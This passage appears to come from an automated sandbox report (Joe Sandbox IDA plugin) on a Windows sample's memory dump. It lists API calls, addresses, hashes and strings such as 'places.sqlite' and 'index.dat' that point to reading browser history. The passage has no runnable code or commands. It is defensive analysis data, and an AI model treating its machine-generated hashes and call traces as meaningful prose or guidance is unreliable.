                                                                                                                                                                                                                                • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                                                                                                                                                                                                                                • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                                                                                                                                                                                                                                • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                                                                                                                                                                                                                                • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                                                                                                                                                                                                                              • memset.MSVCRT ref: 00403A55
                                                                                                                                                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                                • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                                                                • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                                                                                                                • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                                                                                                                                                • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                                                                                                                                                • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: memsetwcscatwcslen$free$AttributesFilememcpywcscpy
                                                                                                                                                                                                                              • String ID: history.dat$places.sqlite
                                                                                                                                                                                                                              • API String ID: 2641622041-467022611
                                                                                                                                                                                                                              • Opcode ID: 9ef9f50687dcf4a121c62199c75cab5672ca0efd30876004e019efa0877f52a8
                                                                                                                                                                                                                              • Instruction ID: 4d52d99a2018a06e8b3479be55870673e402391ac5db5fe9af26a684ed702786
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9ef9f50687dcf4a121c62199c75cab5672ca0efd30876004e019efa0877f52a8
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CA112EB2A0111866DB10FA66CD4AACE77BCAF54354F1001B7B915B20C2EB3CAF45CA69
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00417570: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                                                                                                                                                                                • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                                                                                                                                                                                                                                • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                                                                                                                                                                                                                              • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0041761D
                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00417627
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorLast$File$PointerRead
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 839530781-0
                                                                                                                                                                                                                              • Opcode ID: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                                                                                                                                                                                              • Instruction ID: c9208e3d43fc8ff2949f7201360c8f82def2114e122364bdeb0a9035ecfb973e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D001A236208204BBEB008F69DC45BDA3B78FB153B4F100427F908C6640E275D89096EA
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: FileFindFirst
                                                                                                                                                                                                                              • String ID: *.*$index.dat
                                                                                                                                                                                                                              • API String ID: 1974802433-2863569691
                                                                                                                                                                                                                              • Opcode ID: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                                                                                                                                                                                              • Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 004175A2
                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 004175A8
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorLast$FilePointer
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1156039329-0
                                                                                                                                                                                                                              • Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                                                                                                                                                              • Instruction ID: d6bca62a971eeae6b8c8b5ba9af71e52dcee60bc35e592f51b1cb5e4efccb3e3
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 03F03071918115FBCB009B75DC009AA7ABAFB05360B104726E822D7690E730E9409AA8
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                                                                                                                                                              • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                                                                                                                                                              • CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: File$CloseCreateHandleTime
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3397143404-0
                                                                                                                                                                                                                              • Opcode ID: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                                                                                                                                                                              • Instruction ID: 1a7e7c0172e67e076cb3c0c47f72e507911c66c01d2121fa3096849e88919459
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 23E04F3624036077E2311B2BAC0CF4B2E69FBCBB21F150639F565B21E086704915C665
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                                                                                                                                                              • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                                                                                                                                              • GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Temp$DirectoryFileNamePathWindows
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1125800050-0
                                                                                                                                                                                                                              • Opcode ID: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                                                                                                                                                                              • Instruction ID: b144c37017a21c6b5a3d1d2b3cfc872714830df517851edcd0bc871ed666fd71
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: ACE0927A500218A7DB109B61DC4DFC777BCFB45304F0001B1B945E2161EB349A848BA8
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 004175D0
                                                                                                                                                                                                                              • CloseHandle.KERNELBASE(?,00000000,?,0045DBC0,00417C24,?,00000000,00000000,?,00417DE1,?,00000000), ref: 004175D9
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CloseHandleSleep
                                                                                                                                                                                                                              • String ID: }A
                                                                                                                                                                                                                              • API String ID: 252777609-2138825249
                                                                                                                                                                                                                              • Opcode ID: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                                                                                                                                                                              • Instruction ID: 75b622f9be81829505acbf4f2e76dfbd2ea822dc2a3448742147a61f3b6dc806
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B7E0CD3B1045156ED500577DDCC099773E9EF892347144226F171C25D0C6759C828524
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • malloc.MSVCRT ref: 00409A10
                                                                                                                                                                                                                              • memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                                                                                                                                                              • free.MSVCRT ref: 00409A31
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: freemallocmemcpy
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3056473165-0
                                                                                                                                                                                                                              • Opcode ID: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                                                                                                                                                                                                                              • Instruction ID: 1240433d41d023da9ba75aa62d017d874606d7cfbee4c78203c9aa8101697722
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 88F0E9727092219FC708AE75A98180BB79DAF55314B12482FF404E3282D7389C50CB58
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: d
                                                                                                                                                                                                                              • API String ID: 0-2564639436
                                                                                                                                                                                                                              • Opcode ID: b7bdb433cc21537495b9453c0ef7e1d4136cbb83a95eb0b3518e055101e122e1
                                                                                                                                                                                                                              • Instruction ID: 98c7df9677761670a5e344a1c7628a8b006f0a2246df1cf6f5c5c4488f8f87fd
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b7bdb433cc21537495b9453c0ef7e1d4136cbb83a95eb0b3518e055101e122e1
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4591ABB0508302AFDB20DF19D88196FBBE4BF88358F50192FF88497251D778D985CB9A
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: memset
                                                                                                                                                                                                                              • String ID: BINARY
                                                                                                                                                                                                                              • API String ID: 2221118986-907554435
                                                                                                                                                                                                                              • Opcode ID: 423c094908dc07756a2ef734edd9c41c0411f3bff0f864234720e07ca5cd074c
                                                                                                                                                                                                                              • Instruction ID: 089a0534c11c2c8a1092ab46fa13594887108ded84822111f9e073e703b485f9
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 423c094908dc07756a2ef734edd9c41c0411f3bff0f864234720e07ca5cd074c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 41518B71A047059FDB21CF69C881BEA7BE4EF48350F14446AF849CB342E738D995CBA9
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _wcsicmp
                                                                                                                                                                                                                              • String ID: /stext
                                                                                                                                                                                                                              • API String ID: 2081463915-3817206916
                                                                                                                                                                                                                              • Opcode ID: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                                                                                                                                                                                              • Instruction ID: 10e6e7fbaeb1b3fbdbf907bfc38f809d5841ace5bac79d7196eddb000c1bc607
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 19218E30B00605AFD704EF6ACAC1AD9F7A9FF44304F10416AA419D7342DB79ADA18B95
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                                                                                                                                                • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                                                                                                                                                                • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                                                                • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                                                                                                                                                                                                                                • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                                                                                                                                                                                                                              • CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                                                                                                                                                                • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: File$ByteCharMultiWide$??2@??3@CloseCreateHandleReadSize
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2445788494-0
                                                                                                                                                                                                                              • Opcode ID: c9e98542c376da042cc7e9fe0c2757e169e3ab3aa14d13962e5d64e4fd764852
                                                                                                                                                                                                                              • Instruction ID: dc8783d9a6c7baf78a377756874cfbd60b78407a6d3acdf6d1052ad5173bbb79
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c9e98542c376da042cc7e9fe0c2757e169e3ab3aa14d13962e5d64e4fd764852
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 91118275804208AFDB10AF6ADC45C8A7F75FF01364711C27AF525A72A1D6349A18CBA5
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                                                • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                                                                                                • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                                                • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                                                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3150196962-0
                                                                                                                                                                                                                              • Opcode ID: e13bd3a8970da8505fcd32bc3817dd57930a815364b2861f31204fc1a755a47e
                                                                                                                                                                                                                              • Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e13bd3a8970da8505fcd32bc3817dd57930a815364b2861f31204fc1a755a47e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              • failed to allocate %u bytes of memory, xrefs: 004152F0
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: malloc
                                                                                                                                                                                                                              • String ID: failed to allocate %u bytes of memory
                                                                                                                                                                                                                              • API String ID: 2803490479-1168259600
                                                                                                                                                                                                                              • Opcode ID: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                                                                                                                                                                                                              • Instruction ID: 101c51dc2fc609bd9d1e0073b1fda66f00508c6688545faad3e4fa21ce9dc4bd
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 11E0DFB7B02A12A3C200561AED01AC667959FC122572B013BF92CD3681E638D89687A9
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • memset.MSVCRT ref: 0041BDDF
                                                                                                                                                                                                                              • memcmp.MSVCRT(00001388,?,00000010,?,00000065,00000065,?,?,?,?,?,0041F1B4,?,00000065,004381DF,00000065), ref: 0041BDF1
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: memcmpmemset
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1065087418-0
                                                                                                                                                                                                                              • Opcode ID: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                                                                                                                                                                                              • Instruction ID: cf105cae5e27f97c9cd1c3f46a8d5e16e2707a712041142e317bfb3d1f631299
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2A615B71A01349EBDB14EFA495815EEB7B4EB04308F1440AFE609D3241E738AED4DB99
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040ECF9
                                                                                                                                                                                                                                • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040EDC0
                                                                                                                                                                                                                              • GetStdHandle.KERNEL32(000000F5), ref: 00410530
                                                                                                                                                                                                                              • CloseHandle.KERNELBASE(?), ref: 00410654
                                                                                                                                                                                                                                • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                                                                                                                                                                • Part of subcall function 0040973C: GetLastError.KERNEL32 ref: 00409750
                                                                                                                                                                                                                                • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                                                                                                                                                                                                                                • Part of subcall function 0040973C: MessageBoxW.USER32(?,?,Error,00000030), ref: 00409796
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Handle$??2@??3@CloseCreateErrorFileLastMessage_snwprintf
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1381354015-0
                                                                                                                                                                                                                              • Opcode ID: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                                                                                                                                                                                                              • Instruction ID: c777e68e994987bb064ab7fb99de871126f79ef1b866bcb434911d427814d160
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BE417231A00204EFCB25AF65C885A9E77B6EF84711F20446FF446A7291C7B99EC0DE59
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: memset
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2221118986-0
                                                                                                                                                                                                                              • Opcode ID: 1314b8a525b96e130b2fbb6cbe3c7ee378288528e928e0e3fe9c348834c14d1c
                                                                                                                                                                                                                              • Instruction ID: 1d54aaebfbdefc3985b5f7374fea00c82d73a4224d5df9dcd637b0600b3a95b1
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1314b8a525b96e130b2fbb6cbe3c7ee378288528e928e0e3fe9c348834c14d1c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B2415872500701EFDB349F60E8848AAB7F5FB18314720492FE54AC7690EB38E9C58B98
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: free
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1294909896-0
                                                                                                                                                                                                                              • Opcode ID: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                                                                                                                                                                                              • Instruction ID: 7f33cc2486ffea160e999b9abaf125df84647c5341351ad01334bd221cd3bada
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 32D042B0404B008ED7B0DF39D401602BBF0AB093143118D2E90AAC2A50E775A0149F08
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                                                                                                                                                                                                                                • Part of subcall function 0040A02C: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                                                                                                                                                                • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                                                                                                                                                                • Part of subcall function 0040A02C: CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                                                                                                                                                                              • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000D.00000002.1859995447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: File$Time$CloseCompareCreateHandlememset
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2154303073-0
                                                                                                                                                                                                                              • Opcode ID: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                                                                                                                                                                                              • Instruction ID: d476be81a684c5cf971044fbd14bb177a9e73989d843208b34704cc982626f94
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 11111CB6D00218ABCB11EFA5D9415DEBBB9EF44315F20407BE841F7281DA389F45CB95
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 004135E0: FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
